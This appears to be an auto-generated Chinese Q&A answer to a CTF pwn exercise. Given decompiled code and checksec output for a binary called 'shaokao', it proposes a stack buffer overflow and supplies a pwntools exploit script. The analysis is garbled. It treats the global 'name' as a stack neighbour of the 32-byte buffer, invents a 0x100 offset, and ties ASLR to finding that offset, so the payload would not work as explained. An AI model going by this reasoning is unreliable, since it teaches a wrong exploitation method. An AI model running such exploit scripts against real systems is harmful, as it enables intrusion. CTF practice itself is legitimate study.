本例中的main函数为: int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // edx int v4; // ecx int v5; // r8d int v6; // r9d welcome(argc, argv, envp); while ( 1 ) { switch ( (unsigned int)menu() ) { case 1u: pijiu(); break; case 2u: chuan(); break; case 3u: yue(); break; case 4u: vip(); break; case 5u: if ( own ) gaiming(); break; default: printf((unsigned int)&unk_4B7008, (_DWORD)argv, v3, v4, v5, v6); exit(0LL); } } } gaiming函数为: __int64 gaiming() { int v0; // edx int v1; // ecx int v2; // r8d int v3; // r9d char v5[32]; // [rsp+0h] [rbp-20h] BYREF puts(&unk_4B71C0); _isoc99_scanf((unsigned int)&unk_4B71EB, (unsigned int)v5, v0, v1, v2, v3); j_strcpy_ifunc(&name, v5); return 0LL; } 文件名为shaokao,文件状态为: RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH 2207 Symbols No 0 0 shaokao 给出进行缓冲区溢出攻击给出需要的代码以及详细流程
时间: 2024-01-19 18:02:09 浏览: 316
对于这段代码,我们可以看到存在一个缓冲区溢出漏洞,即在gaiming函数中使用scanf函数读取输入到v5数组时,没有对输入进行长度限制,导致可能会覆盖到name变量的值。
攻击的基本思路是通过输入超长的字符串来覆盖掉name变量的值,从而控制程序的行为。具体的攻击流程如下:
1. 首先需要确定name变量在栈中的偏移量,可以通过调试程序或者静态分析代码来确定。假设name变量在栈中的偏移量为0x100。
2. 构造一个超长的输入字符串,长度应该大于0x100,其中前面部分可以填充任意字符,后面部分需要填充希望覆盖到name变量的值。假设我们想要将name变量的值修改为0xdeadbeef,那么可以构造一个输入字符串如下:
`"A"*0x108 + "\xef\xbe\xad\xde"`
其中"\xef\xbe\xad\xde"是0xdeadbeef的16进制表示。
3. 将构造好的字符串输入到程序中,就可以触发缓冲区溢出漏洞,修改name变量的值。
下面是可能需要的攻击代码:
```
from pwn import *
# 定义目标程序的相关信息
binary = ELF('./shaokao')
context.binary = binary
# 定义本地或远程连接
p = process(binary.path)
# p = remote('ip', port)
# 构造攻击字符串
payload = b"A" * 0x108 + p64(0xdeadbeef)
# 发送攻击字符串
p.sendlineafter(b'name:', payload)
# 进入交互模式
p.interactive()
```
需要注意的是,攻击的成功与否还取决于目标程序的保护机制,例如是否开启了ASLR、栈随机化等。如果目标程序开启了ASLR,则需要先泄漏出程序的基址,才能计算出name变量在栈中的准确偏移量。
阅读全文